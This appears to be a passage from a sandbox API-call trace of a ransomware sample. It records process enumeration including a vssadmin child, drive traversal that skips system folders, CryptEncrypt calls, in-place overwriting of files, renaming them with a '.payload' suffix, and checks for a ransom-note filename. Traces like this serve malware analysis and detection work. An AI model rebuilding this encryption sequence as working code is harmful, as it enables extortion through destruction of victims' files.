lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="transportationinfectionsboys.exe")) returned 1 [0057.659] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="extending.exe")) returned 1 [0057.660] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bringing ip level.exe")) returned 1 [0057.660] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="run_ceramic_resorts.exe")) returned 1 [0057.661] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="acquisition-rebel-crime.exe")) returned 1 [0057.662] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rentrn.exe")) returned 1 [0057.663] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roads-ebay-inspection.exe")) returned 1 [0057.663] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camsitalymedia.exe")) returned 1 [0057.664] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xff4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.668] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfd0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.669] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.670] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="vxjqig.exe")) returned 1 [0057.670] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0057.671] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb60, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.671] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.673] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcac, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.673] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.674] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0057.674] CloseHandle (hObject=0x300) returned 1 [0057.675] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x635328 [0057.676] EnumServicesStatusExW (in: hSCManager=0x635328, InfoLevel=0x0, dwServiceType=0x3b, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19eb0c, lpServicesReturned=0x19eb10, lpResumeHandle=0x19eaf8, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19eb0c, lpServicesReturned=0x19eb10, lpResumeHandle=0x19eaf8) returned 0 [0057.677] GetLastError () returned 0x5 [0057.678] CloseServiceHandle (hSCObject=0x635328) returned 1 [0057.678] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x406268 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0057.678] GetLogicalDrives () returned 0x4 [0057.678] wnsprintfW (in: pszDest=0x19ead8, cchDest=25, pszFmt="%c:\\" | out: pszDest="C:\\") returned 3 [0057.678] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.678] GetProcessHeap () returned 0x5e0000 [0057.678] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x630008 [0057.678] wnsprintfW (in: pszDest=0x630008, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0057.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402640, lpParameter=0x630008, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0057.683] WaitForMultipleObjects (nCount=0x1, lpHandles=0x19eb0c*=0x2f0, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xfa4 Thread: id = 3 os_tid = 0xa24 Thread: id = 4 os_tid = 0xd0c Thread: id = 5 os_tid = 0xf18 Thread: id = 6 os_tid = 0x86c Thread: id = 7 os_tid = 0xf70 Thread: id = 8 os_tid = 0x90c Thread: id = 9 os_tid = 0xd28 Thread: id = 29 os_tid = 0xd7c [0057.694] GetProcessHeap () returned 0x5e0000 [0057.694] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6288d8 [0057.694] wnsprintfW (in: pszDest=0x6288d8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0057.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x342fd30 | out: lpFindFileData=0x342fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x607020 [0057.694] lstrcmpiW (lpString1="$GetCurrent", lpString2="Windows") returned -1 [0057.694] lstrcmpiW (lpString1="$GetCurrent", lpString2="$Recycle.bin") returned -1 [0057.694] lstrcmpiW (lpString1="$GetCurrent", lpString2="System Volume Information") returned -1 [0057.694] lstrcmpiW (lpString1="$GetCurrent", lpString2="Program Files") returned -1 [0057.694] lstrcmpiW (lpString1="$GetCurrent", lpString2="Program Files (x86)") returned -1 [0057.694] wnsprintfW (in: pszDest=0x6288d8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent") returned 18 [0057.694] lstrcmpW (lpString1="$GetCurrent", lpString2=".") returned -1 [0057.694] lstrcmpW (lpString1="$GetCurrent", lpString2="..") returned -1 [0057.694] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0057.694] GetProcessHeap () returned 0x5e0000 [0057.694] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x624df8 [0057.694] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\*") returned 20 [0057.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606be0 [0057.697] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0057.697] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0057.697] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0057.697] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0057.697] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0057.697] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\.") returned 20 [0057.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.697] StrStrIW (lpFirst=".", lpSrch=".payload") returned 0x0 [0057.697] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0057.697] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0057.697] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0057.697] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\." (normalized: "c:\\$getcurrent\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.697] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0057.697] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0057.697] RmStartSession () returned 0x0 [0057.709] RmRegisterResources () returned 0x0 [0057.715] RmGetList () returned 0x6 [0057.770] RmEndSession () returned 0x0 [0057.846] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0057.846] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0057.846] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0057.846] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0057.846] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0057.846] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0057.846] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0057.846] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\..") returned 21 [0057.846] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.846] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.846] StrStrIW (lpFirst="..", lpSrch=".payload") returned 0x0 [0057.846] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0057.846] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0057.846] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0057.846] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.846] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0057.846] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0057.846] RmStartSession () returned 0x0 [0057.851] RmRegisterResources () returned 0x0 [0057.858] RmGetList () returned 0x6 [0057.973] RmEndSession () returned 0x0 [0058.038] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0058.038] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Logs", cAlternateFileName="")) returned 1 [0058.038] lstrcmpiW (lpString1="Logs", lpString2="Windows") returned -1 [0058.038] lstrcmpiW (lpString1="Logs", lpString2="$Recycle.bin") returned 1 [0058.038] lstrcmpiW (lpString1="Logs", lpString2="System Volume Information") returned -1 [0058.039] lstrcmpiW (lpString1="Logs", lpString2="Program Files") returned -1 [0058.039] lstrcmpiW (lpString1="Logs", lpString2="Program Files (x86)") returned -1 [0058.039] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs") returned 23 [0058.039] lstrcmpW (lpString1="Logs", lpString2=".") returned 1 [0058.039] lstrcmpW (lpString1="Logs", lpString2="..") returned 1 [0058.039] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent\\Logs", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.039] GetProcessHeap () returned 0x5e0000 [0058.039] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0058.039] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\*") returned 25 [0058.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606220 [0058.042] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.042] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.042] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.042] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.042] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.042] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\.") returned 25 [0058.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.042] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.042] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.042] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.042] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.042] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.042] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.042] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\..") returned 26 [0058.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.042] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0058.042] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Windows") returned -1 [0058.042] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="$Recycle.bin") returned 1 [0058.042] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="System Volume Information") returned -1 [0058.042] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Program Files") returned -1 [0058.042] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Program Files (x86)") returned -1 [0058.042] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 61 [0058.042] StrStrIW (lpFirst="downlevel_2017_09_07_02_02_39_766.log", lpSrch=".payload") returned 0x0 [0058.042] lstrcmpW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.042] lstrcmpW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="taridd") returned -1 [0058.042] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.042] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.044] GetTickCount () returned 0x114ef43 [0058.044] GetTickCount () returned 0x114ef43 [0058.044] GetTickCount () returned 0x114ef43 [0058.044] GetTickCount () returned 0x114ef43 [0058.044] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.047] GetProcessHeap () returned 0x5e0000 [0058.047] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.048] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.050] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.050] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.050] GetProcessHeap () returned 0x5e0000 [0058.050] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.050] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.050] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.050] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.050] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.050] CloseHandle (hObject=0x438) returned 1 [0058.052] GetProcessHeap () returned 0x5e0000 [0058.052] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.052] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{nhhHyu}.payload") returned 83 [0058.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{nhhhyu}.payload")) returned 1 [0058.053] GetProcessHeap () returned 0x5e0000 [0058.053] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.053] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0058.053] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Windows") returned -1 [0058.053] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="$Recycle.bin") returned 1 [0058.053] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="System Volume Information") returned -1 [0058.053] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Program Files") returned -1 [0058.053] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Program Files (x86)") returned -1 [0058.053] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 56 [0058.053] StrStrIW (lpFirst="oobe_2017_09_07_03_08_57_737.log", lpSrch=".payload") returned 0x0 [0058.053] lstrcmpW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.053] lstrcmpW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="taridd") returned -1 [0058.053] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.053] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.054] GetTickCount () returned 0x114ef43 [0058.054] GetTickCount () returned 0x114ef43 [0058.054] GetTickCount () returned 0x114ef43 [0058.054] GetTickCount () returned 0x114ef43 [0058.054] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.054] GetProcessHeap () returned 0x5e0000 [0058.054] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 